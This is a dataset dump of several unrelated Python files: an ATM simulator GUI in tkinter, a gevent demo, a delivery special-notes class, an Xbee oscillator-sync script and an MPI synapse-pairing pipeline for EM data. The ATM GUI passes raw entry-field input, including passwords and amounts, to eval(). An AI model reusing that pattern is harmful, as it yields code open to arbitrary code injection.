e2.place(x=350, y=273)\r\n self.widget_list.append(e2)\r\n\r\n bt1 = tkinter.Button(self.screen_m,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=300, y=310)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_transfer_accounts(eval(e1.get()), eval(e2.get())))\r\n self.widget_list.append(bt1)\r\n\r\n def page_change_password(self, card_number, balance):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n self.bt_r4_t.set(\"返回\")\r\n self.set_fnc(\"r4\", lambda event: self.page_count(card_number, balance))\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"卡号:%d 账户余额:%.2f\" % (card_number, balance),\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\" 请输入旧密码:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb2.place(x=180, y=240)\r\n self.widget_list.append(lb2)\r\n e1 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e1.place(x=350, y=243)\r\n self.widget_list.append(e1)\r\n\r\n lb3 = tkinter.Label(self.screen_m,\r\n text=\" 请输入新密码:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb3.place(x=180, y=270)\r\n self.widget_list.append(lb3)\r\n e2 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e2.place(x=350, y=273)\r\n self.widget_list.append(e2)\r\n\r\n bt1 = tkinter.Button(self.screen_m,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=300, y=310)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_change_password( eval(e1.get()), eval(e2.get()) ))\r\n self.widget_list.append(bt1)\r\n\r\n def page_freeze_card(self, card_number, balance):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n self.bt_r4_t.set(\"返回\")\r\n self.set_fnc(\"r4\", lambda event: self.page_count(card_number, balance))\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"卡号:%d 账户余额:%.2f\" % (card_number, balance),\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"点击“确定”冻结银行卡\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"center\")\r\n lb2.place(x=230, y=270)\r\n self.widget_list.append(lb2)\r\n\r\n bt1 = tkinter.Button(self.screen_m,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=300, y=310)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_freeze_card())\r\n self.widget_list.append(bt1)\r\n\r\n def page_account_cancellation(self, card_number, balance):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n self.bt_r4_t.set(\"返回\")\r\n self.set_fnc(\"r4\", lambda event: self.page_count(card_number, balance))\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"卡号:%d 账户余额:%.2f\" % (card_number, balance),\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"点击“确定”进行销户\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"center\")\r\n lb2.place(x=230, y=270)\r\n self.widget_list.append(lb2)\r\n bt1 = 
tkinter.Button(self.screen_m,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=300, y=310)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_account_cancellation())\r\n self.widget_list.append(bt1)\r\n\r\n def page_unfreeze_card(self):\r\n self.clear_page()\r\n self.bt_r4_t.set(\"返回\")\r\n self.set_fnc(\"r4\", lambda event: self.page_home())\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"请输入解冻卡号:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=180, y=260)\r\n self.widget_list.append(lb1)\r\n e1 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e1.place(x=350, y=263)\r\n self.widget_list.append(e1)\r\n bt1 = tkinter.Button(self.screen_m,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=320, y=330)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_unfreeze_card(eval(e1.get())))\r\n self.widget_list.append(bt1)\r\n\r\n def page_card_reissue(self):\r\n self.clear_page()\r\n pass\r\n\r\n def loop(self):\r\n self.main_window.mainloop()\r\n pass\r\n\r\n def __new__(cls, *args, **kwargs):\r\n if not hasattr(cls, \"instance\"):\r\n cls.instance = super(ATMGui, cls).__new__(cls)\r\n return cls.instance\r\n\r\n\r\nclass OPGui(object):\r\n pass\r\n\r\n\r\n# 测试用\r\ndef dfnc():\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n gui = ATMGui(dfnc, dfnc, dfnc, dfnc, dfnc, dfnc, dfnc, dfnc, dfnc, dfnc, dfnc, dfnc)\r\n # gui.page_home()\r\n # gui.page_open_count()\r\n gui.page_count(10000000, 15)\r\n # gui.page_withdrawal(10000000, 15)\r\n # gui.page_deposit(10000000, 15)\r\n # gui.page_change_password(10000000, 15)\r\n # gui.page_transfer_accounts(10000000, 15)\r\n # gui.page_freeze_card(10000000, 15)\r\n gui.loop()\r\n pass\r\n","repo_name":"DMdamao/BJ-Python-GP-1","sub_path":"py-basis/各组银行系统带界面/第二组/ATM/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":33974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"41130272745","text":"\"\"\"\n using group.map to get result.\n result from imap is in order(add order), imap_unordered has no order\n Author: xiangtian.hu\n Date: 2017-8-4\n\"\"\"\nfrom gevent import getcurrent\nfrom gevent.pool import Group\ngroup = Group()\n\n\ndef hello_from(n):\n print('Size of group %s' % len(group))\n print('Hello from Greenlet %s' % id(getcurrent()))\n return n\n\n# Could use \"imap\" replace of map, imap return a iterable\nx = group.map(hello_from, range(3))\nprint(type(x))\nprint(x)","repo_name":"xiangtian/pytest","sub_path":"gevent/gevent_group2.py","file_name":"gevent_group2.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11380190851","text":"\nclass SpecialNote:\n def __init__(self, package_id, note):\n self.package_id = package_id\n self.note = note\n\n\nclass SpecialNotesTable:\n # requirements is a list of tuples of form (package_id, special_note_string)\n def __init__(self):\n self.truck_notes = []\n self.delayed_notes = []\n self.delivery_notes = []\n self.address_notes = []\n\n def put(self, package_id_number, note):\n # Creates a SpecialNote and puts it into a table.\n # new_string only contains the important information of the string\n note_string = note\n if \"Can only be on truck\" in note_string:\n new_string = note_string[21:]\n note_to_add = SpecialNote(package_id_number, new_string)\n self.truck_notes.append(note_to_add)\n elif \"Delayed on 
flight\" in note_string:\n new_string = note_string[51:]\n note_to_add = SpecialNote(package_id_number, new_string)\n self.truck_notes.append(note_to_add)\n elif \"Must be delivered with\" in note_string:\n new_string = note_string[23:]\n # stores package ID's of packages that the package must be delivered with as a list\n packages_that_package_must_be_delivered_with = str.split(new_string, sep=\",\")\n note_to_add = SpecialNote(package_id_number, packages_that_package_must_be_delivered_with)\n self.truck_notes.append(note_to_add)\n elif \"Wrong address\" in note_string:\n new_string = \"Wrong address\"\n note_to_add = SpecialNote(package_id_number, new_string)\n self.truck_notes.append(note_to_add)\n\n def update(self, package_id, note):\n # if note exists in one of the tables, then deletes it and puts in new note\n\n truck_notes = self.truck_notes[:]\n for i in range(len(truck_notes)):\n if truck_notes[i].package_id == package_id:\n del self.truck_notes[i]\n self.put(package_id, note)\n return\n\n delayed_notes = self.delayed_notes[:]\n for i in range(len(delayed_notes)):\n if delayed_notes[i].package_id == package_id:\n del self.delayed_notes[i]\n self.put(package_id, note)\n return\n\n delivery_notes = self.delivery_notes[:]\n for i in range(len(delivery_notes)):\n if delivery_notes[i].package_id == package_id:\n del self.delivery_notes[i]\n self.put(package_id, note)\n return\n\n address_notes = self.truck_notes[:]\n for i in range(len(address_notes)):\n if address_notes[i].package_id == package_id:\n del self.address_notes[i]\n self.put(package_id, note)\n return\n\n self.put(package_id, note)\n return","repo_name":"tmax7/Data_Structures_and_Algorithms_II_project","sub_path":"specialnotes.py","file_name":"specialnotes.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8682220383","text":"\r\n\r\nglobal Xbee\r\n\r\nimport time\r\nimport serial\r\n\r\nXbee = serial.Serial('/dev/ttyUSB0', 115200)\r\n\r\n\r\nsyncLimit = 360 #Degree Limit of oscillator\r\ncycleTime = 10 #Length (in seconds) of oscillator cycle\r\nfrequency = syncLimit/cycleTime #Cycle Rate (in degrees per second)\r\ntime_base = time.time()\r\nheading = float(input(\"Please enter robot heading: \"));\r\n\r\n\r\nwhile True:\r\n try:\r\n timeDiff = (time.time() - time_base)\r\n \r\n currentPhase = heading + timeDiff * frequency\r\n \r\n if currentPhase >= syncLimit:\r\n message = '1' # Encoded message for the Xbee to send\r\n Xbee.write(message.encode()) # Encodes the message\r\n print(\"You sent a pulse\")\r\n print(currentPhase)\r\n\r\n time_base += cycleTime #Increases threshold\r\n\r\n\r\n\r\n\r\n if Xbee.inWaiting() > 0: #If the Xbee receives a message\r\n message = Xbee.read(Xbee.inWaiting()).decode() #Decodes and reads the data\r\n\r\n #Find difference between time of receiving pulse vs. 
time of next threshold\r\n #timeDiff = (time.time() - time_base)-cycleTime\r\n\r\n #currentPhase = currentPhase-(timeDiff*frequency*0.5) #Shifts phase forward by half of the difference.\r\n #time_base += timeDiff*0.5 \r\n if timeDiff >= cycleTime/2:\r\n heading =+ (syncLimit - currentPhase)/2\r\n elif timeDiff < cycleTime/2:\r\n heading =- (syncLimit - currentPhase)/2\r\n\r\n except KeyboardInterrupt:\r\n print('Connection Terminated')\r\n break\r\n","repo_name":"mathman93/SPRI2020_Roomba","sub_path":"Cisco Code/PCO_Sync.py","file_name":"PCO_Sync.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20638046508","text":"'''Given vesicle cloud and synaptic junction predictions and a segmented volume, perform synapse pairing.'''\nfrom copy import copy\nimport numpy as np\nimport neuroglancer\nimport networkx as nx\nimport pickle\nfrom cloudvolume import CloudVolume\nfrom cloudvolume.lib import Bbox\nimport json\nfrom scipy import ndimage\nimport h5py\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\nfrom ffn.utils import bounding_box\nfrom pprint import pprint\nimport pandas as pd\nfrom tqdm.auto import tqdm\nimport logging\nimport argparse\nfrom scipy.ndimage.measurements import find_objects, center_of_mass\nfrom em_mask.precomputed_utils import ffn_to_cv, get_chunk_bboxes, prepare_precomputed\n\nimport os\ntqdm.pandas()\n\nfrom skimage.segmentation import find_boundaries, watershed\nimport fastremap\n\nfrom mpi4py import MPI\ntqdm.monitor_interval = 0\nmpi_comm = MPI.COMM_WORLD\nmpi_rank = mpi_comm.Get_rank()\nmpi_size = mpi_comm.Get_size()\n\n# def ffn_to_cv(ffn_bb):\n# '''Convert ffn style bbox to cloudvolume style.'''\n# offset = np.array(ffn_bb.start)\n# size = np.array(ffn_bb.size)\n# return Bbox(a=offset, b=offset+size)\n\n# def get_chunk_bboxes(\n# union_bbox, \n# chunk_size, \n# overlap,\n# include_small_sub_boxes=True,\n# back_shift_small_sub_boxes=False):\n# '''Use ffn bbox calculator to generate overlapping cloudvolume bbox.'''\n# ffn_style_bbox = bounding_box.BoundingBox(\n# np.array(union_bbox.minpt), np.array(union_bbox.size3()))\n\n# calc = bounding_box.OrderlyOverlappingCalculator(\n# outer_box=ffn_style_bbox, \n# sub_box_size=chunk_size, \n# overlap=overlap, \n# include_small_sub_boxes=include_small_sub_boxes,\n# back_shift_small_sub_boxes=back_shift_small_sub_boxes)\n\n# bbs = [ffn_to_cv(ffn_bb) for ffn_bb in calc.generate_sub_boxes()]\n# return bbs\n\ndef get_pos(seg_id, vc_id, overlap, offset):\n pos = np.stack(np.where(np.logical_and(overlap[..., 0] == seg_id, overlap[..., 1] == vc_id)), axis=1)\n med_pos = np.median(pos, axis=0)\n return med_pos + offset\n\ndef keep_max_generic(df, group_name, value_name):\n '''Remove dup group_name rows and keep the max according to value_name'''\n idx = df.groupby([group_name], sort=False)[value_name].transform(max) == df[value_name]\n return df[idx]\n\n\ndef get_all_poses(seg_id, vc_id, overlap, offset):\n sel_mask = np.logical_and(overlap[..., 0] == seg_id, overlap[..., 1] == vc_id)\n pos = np.stack(np.where(sel_mask), axis=1)\n med_pos = np.median(pos, axis=0) + offset\n min_pos = np.min(pos, axis=0) + offset\n max_pos = np.max(pos, axis=0) + offset\n return med_pos, min_pos, max_pos\n\ndef find_vc_fast(seg_chunk, mask_chunk, vc_chunk, offset, vc_thresh=30, size_thresh=500):\n '''For seg_chunk, find all pre synaptic vc sites and find matching post synaptic partner'''\n # mask chunk 1 soma 2 vessel\n 
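# Flow of the code below: suppress vesicle-cloud signal under soma/vessel masks\n
    # and outside the segmentation, smooth it, then label clouds with a seeded\n
    # watershed -- voxels above 2*vc_thresh act as seeds and voxels above vc_thresh\n
    # form the flood mask, so touching clouds are kept as separate labels.\n
    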
vc_chunk[np.isin(mask_chunk, [1, 2])] = 0\n vc_chunk = ndimage.gaussian_filter(vc_chunk, sigma=(2, 2, 1))\n vc_chunk[seg_chunk == 0] = 0\n\n vc_mask = vc_chunk > vc_thresh\n vc_seeds, _ = ndimage.label(vc_chunk > vc_thresh * 2)\n vc_labels = watershed(-vc_chunk, markers=vc_seeds, mask=vc_mask, \n connectivity=np.ones((3,3,3)))\n \n overlap = np.stack([seg_chunk, vc_labels], axis=-1)\n valid_overlaps = overlap[np.logical_and(overlap[..., 0] != 0, overlap[..., 1] != 0), :]\n if not valid_overlaps.shape[0]:\n return None, vc_labels\n uni_pairs, uni_counts = np.unique(valid_overlaps, axis=0, return_counts=True)\n \n\n pair_count_entry = [\n {'seg_id': k[0],\n 'vc_id': k[1],\n 'vc_size': v} for k, v in zip(uni_pairs, uni_counts) if k[0] != 0 and k[1] != 0 and v > size_thresh]\n \n if not len(pair_count_entry):\n return None, vc_labels\n\n seg_vc_df = pd.DataFrame(pair_count_entry)\n seg_vc_df = keep_max_generic(seg_vc_df, 'vc_id', 'vc_size')\n\n # get position with scipy.ndimage.measure\n valid_keys = seg_vc_df['vc_id']\n objs = find_objects(vc_labels)\n cofm = center_of_mass(vc_mask, vc_labels, valid_keys)\n\n pos_entries = {}\n for i, k in enumerate(valid_keys):\n slc = objs[k - 1]\n vc_min = np.array([slc[0].start, slc[1].start, slc[2].start]) + offset\n vc_max = np.array([slc[0].stop, slc[1].stop, slc[2].stop]) + offset\n vc_center = np.round(cofm[i] + offset)\n pos_entries[k] = [vc_center, vc_min, vc_max]\n # print(i, k, pos_entries[k])\n\n seg_vc_df['vc_pos'], seg_vc_df['vc_min_pos'], seg_vc_df['vc_max_pos'] = zip(\n *seg_vc_df.apply(lambda row: pos_entries[row.vc_id], axis=1))\n \n return seg_vc_df, vc_labels\n\n \ndef find_vc(seg_chunk, mask_chunk, vc_chunk, offset, vc_thresh=30, size_thresh=500):\n '''For seg_chunk, find all pre synaptic vc sites and find matching post synaptic partner'''\n # mask chunk 1 soma 2 vessel\n vc_chunk[np.isin(mask_chunk, [1, 2])] = 0\n vc_chunk = ndimage.gaussian_filter(vc_chunk, sigma=(2, 2, 1))\n\n vc_chunk[seg_chunk == 0] = 0\n\n vc_mask = vc_chunk > vc_thresh\n vc_seeds, _ = ndimage.label(vc_chunk > vc_thresh * 2)\n vc_labels = watershed(-vc_chunk, markers=vc_seeds, mask=vc_chunk > vc_thresh, \n connectivity=np.ones((3,3,3)))\n \n overlap = np.stack([seg_chunk, vc_labels], axis=-1)\n valid_overlaps = overlap[np.logical_and(overlap[..., 0] != 0, overlap[..., 1] != 0), :]\n if not valid_overlaps.shape[0]:\n return None, vc_labels\n uni_pairs, uni_counts = np.unique(valid_overlaps, axis=0, return_counts=True)\n \n\n pair_count_entry = [\n {'seg_id': k[0],\n 'vc_id': k[1],\n 'vc_size': v} for k, v in zip(uni_pairs, uni_counts) if k[0] != 0 and k[1] != 0 and v > size_thresh]\n \n if not len(pair_count_entry):\n return None, vc_labels\n\n \n seg_vc_df = pd.DataFrame(pair_count_entry)\n seg_vc_df = keep_max_generic(seg_vc_df, 'vc_id', 'vc_size')\n seg_vc_df['vc_pos'], seg_vc_df['vc_min_pos'], seg_vc_df['vc_max_pos'] = zip(*seg_vc_df.apply(\n lambda row: get_all_poses(row.seg_id, row.vc_id, overlap, offset), axis=1))\n \n return seg_vc_df, vc_labels\n\n \ndef get_neighbors(mask, labels, border_thickness=(5, 5, 2), min_size=100, max_neighbor_count=3):\n '''For a binary mask, find it's neibhor ids in labels.'''\n bin_struct = ndimage.generate_binary_structure(3, 1)\n xy_struct = bin_struct.copy()\n xy_struct[:, :, 0] = 0\n xy_struct[:, :, 2] = 0\n z_struct = np.zeros_like(bin_struct)\n z_struct[1, 1, :] = 1\n \n mask_border = ndimage.binary_dilation(mask, structure=xy_struct, iterations=border_thickness[0])\n mask_border = ndimage.binary_dilation(mask_border, 
structure=z_struct, iterations=border_thickness[2])\n mask_border[mask > 0] = 0\n labels_on_border = np.where(mask_border > 0, labels, 0)\n uni, counts = np.unique(labels_on_border, return_counts=True)\n valid = np.logical_and(uni != 0, counts > min_size)\n uni, counts = uni[valid], counts[valid]\n \n if len(uni) > max_neighbor_count:\n order = np.argsort(counts)[::-1]\n uni, counts = uni[order][:max_neighbor_count], counts[order][:max_neighbor_count]\n \n results = []\n for u, c in zip(uni, counts):\n pos = np.median(np.stack(np.where(labels_on_border == u), axis=1), axis=0)\n results.append({\n 'id': u,\n 'size': c,\n 'pos': pos\n })\n return results\ndef find_sj(seg_vc_df, seg_chunk, vc_labels, mask_chunk, sj_chunk, offset, \n sj_thresh=30, pad=(3, 3, 2), border_thickness=(5, 5, 2), min_sj_size=25, max_neighbor_count=3):\n '''Find sj partner for each vc'''\n line_annos = []\n offset = np.array(offset)\n pad = np.array(pad) # pad bbox around vc object\n valid_pair_entries = []\n seg_ids_with_vc = np.array((seg_vc_df['seg_id']))\n \n sj_chunk[np.isin(mask_chunk, [1, 2])] = 0\n sj_chunk = ndimage.gaussian_filter(sj_chunk, sigma=(1, 1, 0))\n sj_seeds, _ = ndimage.label(sj_chunk > sj_thresh * 2)\n sj_labels = watershed(-sj_chunk, markers=sj_seeds, mask=sj_chunk > sj_thresh, \n connectivity=np.ones((3,3,3)))\n\n input_bb = Bbox((0, 0, 0), seg_chunk.shape)\n \n for ind, row in tqdm(seg_vc_df.iterrows(), total=len(seg_vc_df), disable=True):\n pos = (row.vc_pos - offset).astype(np.int32)\n\n vc_bbox = Bbox(row.vc_min_pos - offset - pad, row.vc_max_pos - offset + pad)\n inter_bb = Bbox.intersection(input_bb, vc_bbox)\n if np.product(inter_bb.size3()) == 0: \n continue\n local_slc = inter_bb.to_slices()\n local_offset = offset + inter_bb.minpt\n \n local_vc_labels = vc_labels[local_slc]\n local_vc_mask = local_vc_labels == row.vc_id\n local_sj_chunk = sj_chunk[local_slc]\n local_sj_labels = sj_labels[local_slc]\n \n sj_entries = get_neighbors(local_vc_mask, local_sj_labels, \n border_thickness, min_sj_size, max_neighbor_count)\n if not len(sj_entries):\n continue\n for s in sj_entries:\n mean_sj_value = np.mean(local_sj_chunk[local_sj_labels == s['id']])\n norm_size = s['size'] * min(mean_sj_value / 128.0, 1.0)\n if norm_size < min_sj_size:\n continue\n valid_pair_entries.append({\n 'pre_seg_id': row.seg_id,\n 'vc_id': row.vc_id,\n 'vc_pos': row.vc_pos,\n 'vc_size': row.vc_size,\n 'sj_id': s['id'],\n 'sj_pos': s['pos'] + local_offset,\n 'sj_size': s['size'],\n 'sj_norm_size': norm_size,\n 'sj_value': mean_sj_value\n })\n synapse_df = pd.DataFrame(valid_pair_entries)\n if not len(synapse_df):\n return None, sj_labels\n synapse_df = keep_max_generic(synapse_df, 'sj_id', 'sj_size')\n return synapse_df, sj_labels\n\n\ndef get_angle_old(a, b, c):\n ba = a - b\n bc = c - b\n base = np.linalg.norm(ba) * np.linalg.norm(bc)\n if base == 0:\n return 0\n cosine_angle = np.dot(ba, bc) / base\n angle = np.arccos(cosine_angle)\n return np.degrees(angle)\ndef get_angle(a, b, c):\n ba = a - b\n bc = c - b\n sign = np.sign(np.dot(ba, bc))\n base = np.dot(ba, ba) * np.dot(bc, bc)\n # base = np.linalg.norm(ba) * np.linalg.norm(bc)\n if base == 0:\n return 0\n cos = sign * np.sqrt(np.dot(ba, bc) ** 2 / base)\n return np.degrees(np.arccos(cos))\n # cosine_angle = np.dot(ba, bc) / base\n # angle = np.arccos(cosine_angle)\n # return np.degrees(angle)\n\n\ndef find_post_syn(synapse_df, seg_chunk, sj_labels, offset, \n rad=(50, 50, 10), max_angle=90.0, border_thickness=(3, 3, 2)):\n input_bb = Bbox((0, 0, 0), 
seg_chunk.shape)\n synapse_entries = []\n pre_seg_ids = synapse_df.index\n for ind, row in tqdm(synapse_df.iterrows(), total=len(synapse_df), disable=True):\n pos = (row.sj_pos - offset).astype(np.int32)\n inter_bb = Bbox.intersection(input_bb, Bbox(pos - rad, pos + rad))\n if np.product(inter_bb.size3()) == 0: \n continue\n local_slc = inter_bb.to_slices()\n local_offset = offset + inter_bb.minpt\n \n local_sj_labels = sj_labels[local_slc]\n local_sj_mask = local_sj_labels == row.sj_id\n local_seg_chunk = seg_chunk[local_slc]\n \n post_seg_entries = get_neighbors(local_sj_mask, local_seg_chunk, \n border_thickness=border_thickness, min_size=5)\n pre_seg_entry = [ps for ps in post_seg_entries if ps['id'] == row.pre_seg_id]\n if len(pre_seg_entry) < 1:\n # if cannot find pre_seg_id in neighbor, which is rare, use vc_pos as pre pos\n pre_pos = np.array(row.vc_pos)\n else:\n # if can find pre_seg_id in neighbor, use the median as pre seg pos\n pre_pos = pre_seg_entry[0]['pos'] + local_offset\n post_seg_entries = [ps for ps in post_seg_entries if ps['id'] != row.pre_seg_id and ps['id'] not in pre_seg_ids]\n\n \n # chose the largest one that forms obtuse angle vc - sj - post\n for ps in post_seg_entries:\n ps['angle'] = get_angle(pre_pos, row.sj_pos, ps['pos'] +local_offset) \n # logging.warning('pos %s', ps['pos'])\n # if np.isnan(ps['angle']):\n # logging.warning('failed at %s, %s, %s', pre_pos, ps['pos'])\n # logging.warning('failed at %s, %s, %s', pre_pos, row.sj_pos, ps['pos'] + local_offset)\n # return\n post_seg_entries = [ps for ps in post_seg_entries if ps['angle'] > max_angle]\n if not post_seg_entries: continue\n # each sj can only have one post syn seg partner\n max_ps = max(post_seg_entries, key=lambda ps: ps['size'])\n post_pos = max_ps['pos'] + local_offset \n\n synapse_entries.append({\n 'pre_seg_id': row.pre_seg_id,\n 'post_seg_id': max_ps['id'],\n 'vc_id': row.vc_id,\n 'vc_pos': row.vc_pos,\n 'vc_size': row.vc_size,\n 'sj_id': row.sj_id,\n 'sj_pos': row.sj_pos.tolist(),\n 'sj_size': row.sj_size,\n 'sj_norm_size': row.sj_norm_size,\n 'sj_value': row.sj_value,\n 'pre_seg_pos': pre_pos.tolist(),\n 'post_seg_pos': post_pos.tolist()\n })\n new_synapse_df = pd.DataFrame(synapse_entries)\n line_annos = [neuroglancer.LineAnnotation(\n point_a=row.vc_pos,\n point_b=row.post_seg_pos,\n id=ind) for ind, row in new_synapse_df.iterrows()]\n return new_synapse_df, line_annos\n\ndef analyze_synapse(\n segmentation_vol, vc_vol, sj_vol, mask_vol, mask_mip,\n output_dir, chunk_size, overlap, offset, size):\n '''\n segmentaion, vc, sj are by default at same mip level\n '''\n vc_thresh = 5\n sj_thresh = 5\n chunk_size = np.array(chunk_size)\n overlap = np.array(overlap)\n if mpi_rank == 0:\n os.makedirs(output_dir, exist_ok=True)\n cv_args = dict(progress=False, parallel=False, fill_missing=True, bounded=False)\n seg_cv = CloudVolume('file://%s' % segmentation_vol, mip=0, **cv_args)\n vc_cv = CloudVolume('file://%s' % vc_vol, mip=0, **cv_args)\n sj_cv = CloudVolume('file://%s' % sj_vol, mip=0, **cv_args)\n mask_cv = CloudVolume('file://%s' % mask_vol, mip=mask_mip, **cv_args)\n if offset is None or size is None:\n union_bb = Bbox.intersection(seg_cv.meta.bounds(0), vc_cv.meta.bounds(0))\n offset = union_bb.minpt\n size = union_bb.size3()\n offset = np.array(offset)\n size = np.array(size)\n print(offset, size)\n\n union_bb = Bbox(offset, offset + size)\n print(union_bb)\n bbs = get_chunk_bboxes(union_bb, chunk_size, overlap)\n print(len(bbs))\n all_inds = np.arange(len(bbs))\n 
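# shuffling the chunk indices before np.array_split below spreads dense and\n
        # empty chunks across MPI ranks, which roughly balances the per-rank workload\n
        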
np.random.shuffle(all_inds)\n sub_inds = np.array_split(all_inds, mpi_size)\n # sub_bbs = np.array_split(bbs, mpi_size)\n else:\n seg_cv = None\n vc_cv = None\n sj_cv = None\n mask_cv = None\n bbs = None\n sub_inds = None\n # sub_bbs = None\n\n seg_cv = mpi_comm.bcast(seg_cv, 0)\n vc_cv = mpi_comm.bcast(vc_cv, 0)\n sj_cv = mpi_comm.bcast(sj_cv, 0)\n mask_cv = mpi_comm.bcast(mask_cv, 0)\n # sub_bbs = mpi_comm.scatter(sub_bbs, 0)\n bbs = mpi_comm.bcast(bbs, 0)\n sub_inds = mpi_comm.scatter(sub_inds, 0)\n \n padding = overlap // 2\n all_vc_dfs = []\n all_syn_dfs = []\n # for ind, bb in tqdm(enumerate(sub_bbs), total=len(sub_bbs), desc='iterate bbs'):\n for ind in tqdm(sub_inds, total=len(sub_inds), desc='iterate bbs'):\n bb = bbs[ind]\n bb = Bbox(bb.minpt + padding, bb.maxpt - padding)\n offset = bb.minpt\n seg_chunk = np.array(seg_cv[bb])[..., 0]\n vc_chunk = np.array(vc_cv[bb])[..., 0]\n sj_chunk = np.array(sj_cv[bb])[..., 0]\n mask_chunk = np.array(mask_cv[bb])[..., 0]\n if np.logical_or.reduce(seg_chunk.ravel()) == 0:\n continue\n\n vc_df, vc_labels = find_vc_fast(\n seg_chunk, mask_chunk, vc_chunk, offset, \n vc_thresh=vc_thresh, size_thresh=100)\n if vc_df is None:\n continue\n all_vc_dfs.append(vc_df)\n\n pre_synapse_df, sj_labels = find_sj(\n vc_df, seg_chunk, vc_labels, mask_chunk, sj_chunk, offset, \n pad=(3, 3, 2), border_thickness=(3, 3, 2), min_sj_size=60, \n max_neighbor_count=3)\n if pre_synapse_df is None:\n continue\n synapse_df, sj_psd_annos = find_post_syn(pre_synapse_df, seg_chunk, sj_labels, \n offset, rad=(20, 20, 3), max_angle=60.0, border_thickness=(3, 3, 2))\n\n\n if len(synapse_df):\n cube_df_path = os.path.join(output_dir, 'synapse_%d_%d_%d.csv' % (offset[0], offset[1], offset[2]))\n synapse_df = synapse_df.set_index(['pre_seg_id', 'post_seg_id'])\n synapse_df.to_csv(cube_df_path)\n\n all_syn_dfs.append(synapse_df)\n\n mpi_comm.barrier()\n logging.warning('rank %d reached', mpi_rank)\n all_vc_dfs = mpi_comm.reduce(all_vc_dfs, MPI.SUM, 0)\n all_syn_dfs = mpi_comm.reduce(all_syn_dfs, MPI.SUM, 0)\n if mpi_rank == 0:\n all_vc_df = pd.concat(all_vc_dfs)\n vc_out_path = os.path.join(output_dir, 'vc.csv')\n all_vc_df.to_csv(vc_out_path)\n\n all_syn_df = pd.concat(all_syn_dfs)\n syn_out_path = os.path.join(output_dir, 'synapse.csv')\n all_syn_df.to_csv(syn_out_path)\n \n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"segmentation_vol\", type=str, help=\"segmentation volume\")\n parser.add_argument(\"vc_vol\", type=str, help=\"vc volume\")\n parser.add_argument(\"sj_vol\", type=str, help=\"sj volume\")\n parser.add_argument(\"--mask_vol\", type=str, help=\"mask volume\")\n parser.add_argument(\"--mask_mip\", default=0, type=int, help=\"mask mip\")\n parser.add_argument(\"--output_dir\", type=str, default=None)\n parser.add_argument(\"--chunk_size\", type=str, default='512,512,128')\n parser.add_argument(\"--overlap\", type=str, default='32,32,16')\n parser.add_argument(\"--offset\", type=str, default=None)\n parser.add_argument(\"--size\", type=str, default=None)\n\n # params to control syn finding\n\n args = parser.parse_args()\n chunk_size = [int(i) for i in args.chunk_size.split(',')]\n overlap = [int(i) for i in args.overlap.split(',')]\n if args.offset:\n offset = [int(i) for i in args.offset.split(',')]\n else:\n offset = None\n \n if args.size:\n size = [int(i) for i in args.size.split(',')]\n else:\n size = None\n\n analyze_synapse(args.segmentation_vol, 